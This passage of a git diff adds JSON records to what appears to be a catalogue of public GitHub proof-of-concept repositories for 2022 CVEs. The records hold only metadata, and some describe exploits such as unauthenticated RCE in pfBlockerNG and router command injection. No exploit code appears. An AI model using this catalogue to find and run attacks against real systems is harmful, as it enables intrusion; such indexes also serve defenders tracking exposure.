"https:\/\/github.com\/irsl\/CVE-2022-3168-adb-unexpected-reverse-forwards", + "description": "Proof of concept code to exploit flaw in adb that allowed opening network connections on the host to arbitrary destinations", + "fork": false, + "created_at": "2022-09-09T12:31:56Z", + "updated_at": "2022-10-25T18:56:10Z", + "pushed_at": "2022-09-09T12:39:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31691.json b/2022/CVE-2022-31691.json new file mode 100644 index 0000000000..768d97d5bc --- /dev/null +++ b/2022/CVE-2022-31691.json @@ -0,0 +1,33 @@ +[ + { + "id": 567279826, + "name": "CVE-2022-31691", + "full_name": "SpindleSec\/CVE-2022-31691", + "owner": { + "login": "SpindleSec", + "id": 114083317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114083317?v=4", + "html_url": "https:\/\/github.com\/SpindleSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpindleSec\/CVE-2022-31691", + "description": "A write-up of my (so far inconclusive) look into CVE-2022-31691", + "fork": false, + "created_at": "2022-11-17T13:09:03Z", + "updated_at": "2022-11-18T01:18:47Z", + "pushed_at": "2022-11-17T15:19:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31692.json b/2022/CVE-2022-31692.json new file mode 100644 index 0000000000..0798265db9 --- /dev/null +++ b/2022/CVE-2022-31692.json @@ -0,0 +1,64 @@ +[ + { + "id": 561229376, + "name": "cve-2022-31692", + "full_name": "SpindleSec\/cve-2022-31692", + "owner": { + "login": "SpindleSec", + "id": 114083317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114083317?v=4", + "html_url": "https:\/\/github.com\/SpindleSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpindleSec\/cve-2022-31692", + "description": "A project demonstrating an app that is vulnerable to Spring Security authorization bypass CVE-2022-31692", + "fork": false, + "created_at": "2022-11-03T08:35:20Z", + "updated_at": "2024-08-12T20:28:09Z", + "pushed_at": "2022-11-07T11:00:43Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 36, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711577493, + "name": "cve-2022-31692", + "full_name": "hotblac\/cve-2022-31692", + "owner": { + "login": "hotblac", + "id": 4406140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4406140?v=4", + "html_url": "https:\/\/github.com\/hotblac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hotblac\/cve-2022-31692", + "description": "Demonstration of CVE-2022-31692 authorization bypass in Spring Security", + "fork": false, + "created_at": "2023-10-29T17:31:23Z", + "updated_at": "2023-10-29T17:31:49Z", + "pushed_at": "2023-12-02T11:23:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31705.json b/2022/CVE-2022-31705.json new file mode 100644 index 0000000000..1daecdcbbe --- /dev/null +++ b/2022/CVE-2022-31705.json @@ -0,0 +1,33 @@ +[ + { + "id": 586726069, + "name": "cve-2022-31705", + "full_name": "s0duku\/cve-2022-31705", + "owner": { + "login": "s0duku", + "id": 83897807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83897807?v=4", + "html_url": "https:\/\/github.com\/s0duku", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s0duku\/cve-2022-31705", + "description": "CVE-2022-31705 (Geekpwn 2022 Vmware EHCI OOB) POC ", + "fork": false, + "created_at": "2023-01-09T04:27:15Z", + "updated_at": "2024-08-12T20:29:15Z", + "pushed_at": "2023-01-09T08:19:27Z", + "stargazers_count": 118, + "watchers_count": 118, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 118, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3172.json b/2022/CVE-2022-3172.json new file mode 100644 index 0000000000..d10537ef29 --- /dev/null +++ b/2022/CVE-2022-3172.json @@ -0,0 +1,33 @@ +[ + { + "id": 780911426, + "name": "CVE-2022-3172", + "full_name": "UgOrange\/CVE-2022-3172", + "owner": { + "login": "UgOrange", + "id": 28263639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28263639?v=4", + "html_url": "https:\/\/github.com\/UgOrange", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UgOrange\/CVE-2022-3172", + "description": null, + "fork": false, + "created_at": "2024-04-02T11:53:54Z", + "updated_at": "2024-04-02T11:54:42Z", + "pushed_at": "2024-04-02T11:54:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31749.json b/2022/CVE-2022-31749.json index 35c0b48e98..ccfe37f01d 100644 --- a/2022/CVE-2022-31749.json +++ b/2022/CVE-2022-31749.json @@ -34,5 +34,36 @@ "watchers": 10, "score": 0, "subscribers_count": 1 + }, + { + "id": 511068230, + "name": "cve-2022-31749", + "full_name": "iveresk\/cve-2022-31749", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2022-31749", + "description": "Simple PoC-checker for CVE-2022-31749 by 1vere$k", + "fork": false, + "created_at": "2022-07-06T09:15:49Z", + "updated_at": "2022-07-06T12:34:20Z", + "pushed_at": "2022-07-06T12:35:10Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-31793.json b/2022/CVE-2022-31793.json new file mode 100644 index 0000000000..b27102b38c --- /dev/null +++ b/2022/CVE-2022-31793.json @@ -0,0 +1,33 @@ +[ + { + "id": 526427861, + "name": "CVE-2022-31793", + "full_name": "xpgdgit\/CVE-2022-31793", + "owner": { + "login": "xpgdgit", + "id": 30492998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30492998?v=4", + "html_url": "https:\/\/github.com\/xpgdgit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xpgdgit\/CVE-2022-31793", + "description": null, + "fork": false, + "created_at": "2022-08-19T01:42:08Z", + "updated_at": "2023-04-06T15:16:39Z", + "pushed_at": "2022-08-19T01:55:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31798.json b/2022/CVE-2022-31798.json new file mode 100644 index 0000000000..2851616b43 --- /dev/null +++ b/2022/CVE-2022-31798.json @@ -0,0 +1,33 @@ +[ + { + "id": 540472741, + "name": "CVE-2022-31798", + "full_name": "omarhashem123\/CVE-2022-31798", + "owner": { + "login": "omarhashem123", + "id": 70245773, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70245773?v=4", + "html_url": "https:\/\/github.com\/omarhashem123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omarhashem123\/CVE-2022-31798", + "description": "CVE-2022-31798 Proof of Concept", + "fork": false, + "created_at": "2022-09-23T14:13:26Z", + "updated_at": "2022-09-27T04:16:14Z", + "pushed_at": "2022-11-06T09:59:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31814.json b/2022/CVE-2022-31814.json new file mode 100644 index 0000000000..21fd8132dd --- /dev/null +++ b/2022/CVE-2022-31814.json @@ -0,0 +1,265 @@ +[ + { + "id": 538083210, + "name": "SenselessViolence", + "full_name": "EvergreenCartoons\/SenselessViolence", + "owner": { + "login": "EvergreenCartoons", + "id": 113829980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113829980?v=4", + "html_url": "https:\/\/github.com\/EvergreenCartoons", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EvergreenCartoons\/SenselessViolence", + "description": "CVE-2022-31814 Exploitation Toolkit.", + "fork": false, + "created_at": "2022-09-18T11:10:04Z", + "updated_at": "2024-08-10T07:10:23Z", + "pushed_at": "2022-09-21T13:41:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "hacking", + "pfsense", + "security-tools" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605094197, + "name": "CVE-2022-31814", + "full_name": "Madliife0\/CVE-2022-31814", + "owner": { + "login": "Madliife0", + "id": 64816845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64816845?v=4", + "html_url": "https:\/\/github.com\/Madliife0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Madliife0\/CVE-2022-31814", + "description": null, + "fork": false, + "created_at": "2023-02-22T12:38:13Z", + "updated_at": "2023-02-22T12:38:13Z", + "pushed_at": "2023-02-22T12:38:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 608172527, + "name": "CVE-2022-31814", + "full_name": "TheUnknownSoul\/CVE-2022-31814", + "owner": { + "login": "TheUnknownSoul", + "id": 58050201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58050201?v=4", + "html_url": "https:\/\/github.com\/TheUnknownSoul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheUnknownSoul\/CVE-2022-31814", + "description": null, + "fork": false, + "created_at": "2023-03-01T13:24:29Z", + "updated_at": "2023-03-01T16:14:01Z", + "pushed_at": "2023-03-03T08:22:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609702147, + "name": "RCE", + "full_name": "drcayber\/RCE", + "owner": { + "login": "drcayber", + "id": 101327574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101327574?v=4", + "html_url": "https:\/\/github.com\/drcayber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drcayber\/RCE", + "description": "CVE-2022-31814", + "fork": false, + "created_at": "2023-03-05T00:56:14Z", + "updated_at": "2023-09-19T17:16:18Z", + "pushed_at": "2023-03-05T01:07:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bug", + "exploit", + "hunting", + "python", + "rce", + "rce-exploit", + "rce-scanner", + "web", + "webapplication" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618996369, + "name": "CVE-2022-31814", + "full_name": "Chocapikk\/CVE-2022-31814", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-31814", + "description": "pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)", + "fork": false, + "created_at": "2023-03-26T00:18:04Z", + "updated_at": "2024-09-08T03:28:15Z", + "pushed_at": "2023-03-26T00:25:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 619242757, + "name": "CVE-2022-31814", + "full_name": "dkstar11q\/CVE-2022-31814", + "owner": { + "login": "dkstar11q", + "id": 123830677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123830677?v=4", + "html_url": "https:\/\/github.com\/dkstar11q", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dkstar11q\/CVE-2022-31814", + "description": "pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)", + "fork": false, + "created_at": "2023-03-26T17:22:40Z", + "updated_at": "2024-08-10T07:10:31Z", + "pushed_at": "2023-03-26T00:25:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 832573377, + "name": "CVE-2022-31814", + "full_name": "Laburity\/CVE-2022-31814", + "owner": { + "login": "Laburity", + "id": 130553966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130553966?v=4", + "html_url": "https:\/\/github.com\/Laburity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Laburity\/CVE-2022-31814", + "description": "Updated Exploit - pfBlockerNG <= 2.1.4_26 Unauth RCE (CVE-2022-31814)", + "fork": false, + "created_at": "2024-07-23T09:44:46Z", + "updated_at": "2024-09-18T22:48:05Z", + "pushed_at": "2024-07-23T10:03:08Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 23, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 841455990, + "name": "CVE-2022-31814", + "full_name": "ArunHAtter\/CVE-2022-31814", + "owner": { + "login": "ArunHAtter", + "id": 53938283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53938283?v=4", + "html_url": "https:\/\/github.com\/ArunHAtter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ArunHAtter\/CVE-2022-31814", + "description": "This script is a proof-of-concept exploit for pfBlockerNG <= 2.1.4_26 that allows for remote code execution. It takes a single target URL or a list of URLs, tries to upload a shell using multiple payloads, executes a command, and then deletes the shell.", + "fork": false, + "created_at": "2024-08-12T12:50:48Z", + "updated_at": "2024-08-12T12:57:41Z", + "pushed_at": "2024-08-12T12:57:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31854.json b/2022/CVE-2022-31854.json new file mode 100644 index 0000000000..1603ee82ab --- /dev/null +++ b/2022/CVE-2022-31854.json @@ -0,0 +1,33 @@ +[ + { + "id": 511582709, + "name": "CVE-2022-31854", + "full_name": "Vikaran101\/CVE-2022-31854", + "owner": { + "login": "Vikaran101", + "id": 108887353, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108887353?v=4", + "html_url": "https:\/\/github.com\/Vikaran101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vikaran101\/CVE-2022-31854", + "description": "CodoForum v5.1 - File Upload Bypass to RCE (Authenticated) exploit code", + "fork": false, + "created_at": "2022-07-07T15:33:07Z", + "updated_at": "2023-04-17T14:26:27Z", + "pushed_at": "2022-07-07T15:36:45Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31889.json b/2022/CVE-2022-31889.json new file mode 100644 index 0000000000..5441d1453c --- /dev/null +++ b/2022/CVE-2022-31889.json @@ -0,0 +1,33 @@ +[ + { + "id": 603422212, + "name": "CVE-2022-31889", + "full_name": "reewardius\/CVE-2022-31889", + "owner": { + "login": "reewardius", + "id": 68978608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4", + "html_url": "https:\/\/github.com\/reewardius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-31889", + "description": null, + "fork": false, + "created_at": "2023-02-18T13:14:53Z", + "updated_at": "2023-02-18T13:14:53Z", + "pushed_at": "2023-02-18T13:25:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31890.json b/2022/CVE-2022-31890.json new file mode 100644 index 0000000000..27e7f86ebf --- /dev/null +++ b/2022/CVE-2022-31890.json @@ -0,0 +1,33 @@ +[ + { + "id": 603412932, + "name": "CVE-2022-31890", + "full_name": "reewardius\/CVE-2022-31890", + "owner": { + "login": "reewardius", + "id": 68978608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4", + "html_url": "https:\/\/github.com\/reewardius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-31890", + "description": null, + "fork": false, + "created_at": "2023-02-18T12:40:45Z", + "updated_at": "2023-09-13T12:24:53Z", + "pushed_at": "2023-02-18T13:09:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31897.json b/2022/CVE-2022-31897.json new file mode 100644 index 0000000000..9ea70f4631 --- /dev/null +++ b/2022/CVE-2022-31897.json @@ -0,0 +1,33 @@ +[ + { + "id": 514552098, + "name": "CVE-2022-31897", + "full_name": "angelopioamirante\/CVE-2022-31897", + "owner": { + "login": "angelopioamirante", + "id": 38589929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38589929?v=4", + "html_url": "https:\/\/github.com\/angelopioamirante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/angelopioamirante\/CVE-2022-31897", + "description": "Zoo Management System 1.0 - Reflected Cross-Site-Scripting (XSS)", + "fork": false, + "created_at": "2022-07-16T10:55:32Z", + "updated_at": "2022-07-16T10:59:46Z", + "pushed_at": "2022-07-16T10:59:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31898.json b/2022/CVE-2022-31898.json new file mode 100644 index 0000000000..232c7f3063 --- /dev/null +++ b/2022/CVE-2022-31898.json @@ -0,0 +1,38 @@ +[ + { + "id": 564618463, + "name": "cve-2022-31898", + "full_name": "gigaryte\/cve-2022-31898", + "owner": { + "login": "gigaryte", + "id": 8154801, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8154801?v=4", + "html_url": "https:\/\/github.com\/gigaryte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gigaryte\/cve-2022-31898", + "description": "Exploit POC code for CVE-2022-31898, a command injection for GL-iNet routers with firmware below 3.215", + "fork": false, + "created_at": "2022-11-11T05:11:14Z", + "updated_at": "2023-12-11T06:17:46Z", + "pushed_at": "2022-11-17T12:58:20Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-31898", + "exploit", + "gl-inet" + ], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31901.json b/2022/CVE-2022-31901.json new file mode 100644 index 0000000000..ccdfb0f78d --- /dev/null +++ b/2022/CVE-2022-31901.json @@ -0,0 +1,33 @@ +[ + { + "id": 512699304, + "name": "CVE-2022-31901", + "full_name": "CDACesec\/CVE-2022-31901", + "owner": { + "login": "CDACesec", + "id": 102668343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102668343?v=4", + "html_url": "https:\/\/github.com\/CDACesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CDACesec\/CVE-2022-31901", + "description": null, + "fork": false, + "created_at": "2022-07-11T09:47:16Z", + "updated_at": "2023-01-09T05:16:21Z", + "pushed_at": "2023-02-01T11:10:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-31902.json b/2022/CVE-2022-31902.json new file mode 100644 index 0000000000..1c1f2adb8b --- /dev/null +++ b/2022/CVE-2022-31902.json @@ -0,0 +1,33 @@ +[ + { + "id": 512712652, + "name": "CVE-2022-31902", + "full_name": "CDACesec\/CVE-2022-31902", + "owner": { + "login": "CDACesec", + "id": 102668343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102668343?v=4", + "html_url": "https:\/\/github.com\/CDACesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CDACesec\/CVE-2022-31902", + "description": null, + "fork": false, + "created_at": "2022-07-11T10:32:08Z", + "updated_at": "2023-02-18T11:24:59Z", + "pushed_at": "2023-02-01T11:09:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32060.json b/2022/CVE-2022-32060.json new file mode 100644 index 0000000000..be483aa82c --- /dev/null +++ b/2022/CVE-2022-32060.json @@ -0,0 +1,33 @@ +[ + { + "id": 569794902, + "name": "CVE-2022-32060", + "full_name": "bypazs\/CVE-2022-32060", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-32060", + "description": "An arbitrary file upload vulnerability in the Update Branding Settings component of Snipe-IT v6.0.2 allows attackers to execute arbitrary code via a crafted file.", + "fork": false, + "created_at": "2022-11-23T16:20:24Z", + "updated_at": "2022-12-10T11:11:55Z", + "pushed_at": "2022-11-23T16:31:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32073.json b/2022/CVE-2022-32073.json new file mode 100644 index 0000000000..2f887d8588 --- /dev/null +++ b/2022/CVE-2022-32073.json @@ -0,0 +1,33 @@ +[ + { + "id": 571969450, + "name": "project_BIT_nmap_script", + "full_name": "mgregus\/project_BIT_nmap_script", + "owner": { + "login": "mgregus", + "id": 56076866, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56076866?v=4", + "html_url": "https:\/\/github.com\/mgregus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mgregus\/project_BIT_nmap_script", + "description": "Nmap .nse script to scan for CVE-2022-32073 in wolfssh", + "fork": false, + "created_at": "2022-11-29T09:28:18Z", + "updated_at": "2022-12-08T10:18:19Z", + "pushed_at": "2022-11-29T12:12:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32074.json b/2022/CVE-2022-32074.json new file mode 100644 index 0000000000..09de32279e --- /dev/null +++ b/2022/CVE-2022-32074.json @@ -0,0 +1,33 @@ +[ + { + "id": 603423307, + "name": "CVE-2022-32074", + "full_name": "reewardius\/CVE-2022-32074", + "owner": { + "login": "reewardius", + "id": 68978608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4", + "html_url": "https:\/\/github.com\/reewardius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-32074", + "description": null, + "fork": false, + "created_at": "2023-02-18T13:19:03Z", + "updated_at": "2023-02-18T13:19:03Z", + "pushed_at": "2023-02-18T13:25:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32132.json b/2022/CVE-2022-32132.json new file mode 100644 index 0000000000..8827e85728 --- /dev/null +++ b/2022/CVE-2022-32132.json @@ -0,0 +1,33 @@ +[ + { + "id": 603421211, + "name": "CVE-2022-32132", + "full_name": "reewardius\/CVE-2022-32132", + "owner": { + "login": "reewardius", + "id": 68978608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68978608?v=4", + "html_url": "https:\/\/github.com\/reewardius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reewardius\/CVE-2022-32132", + "description": null, + "fork": false, + "created_at": "2023-02-18T13:11:13Z", + "updated_at": "2023-02-18T13:11:13Z", + "pushed_at": "2023-02-18T13:24:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32199.json b/2022/CVE-2022-32199.json new file mode 100644 index 0000000000..2b2322398f --- /dev/null +++ b/2022/CVE-2022-32199.json @@ -0,0 +1,33 @@ +[ + { + "id": 618754016, + "name": "CVE-2022-32199", + "full_name": "Toxich4\/CVE-2022-32199", + "owner": { + "login": "Toxich4", + "id": 47368696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47368696?v=4", + "html_url": "https:\/\/github.com\/Toxich4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Toxich4\/CVE-2022-32199", + "description": null, + "fork": false, + "created_at": "2023-03-25T08:49:58Z", + "updated_at": "2023-03-26T15:11:43Z", + "pushed_at": "2023-03-29T12:58:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-32206.json b/2022/CVE-2022-32206.json new file mode 100644 index 0000000000..23defae17c --- /dev/null +++ b/2022/CVE-2022-32206.json @@ -0,0 +1,33 @@ +[ + { + "id": 892027168, + "name": "external_curl_AOSP10_CVE-2022-32206", + "full_name": "HimanshuS67\/external_curl_AOSP10_CVE-2022-32206", + "owner": { + "login": "HimanshuS67", + "id": 188300861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188300861?v=4", + "html_url": "https:\/\/github.com\/HimanshuS67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HimanshuS67\/external_curl_AOSP10_CVE-2022-32206", + "description": null, + "fork": false, + "created_at": "2024-11-21T11:38:25Z", + "updated_at": "2024-11-21T11:40:09Z", + "pushed_at": "2024-11-21T11:40:09Z", + 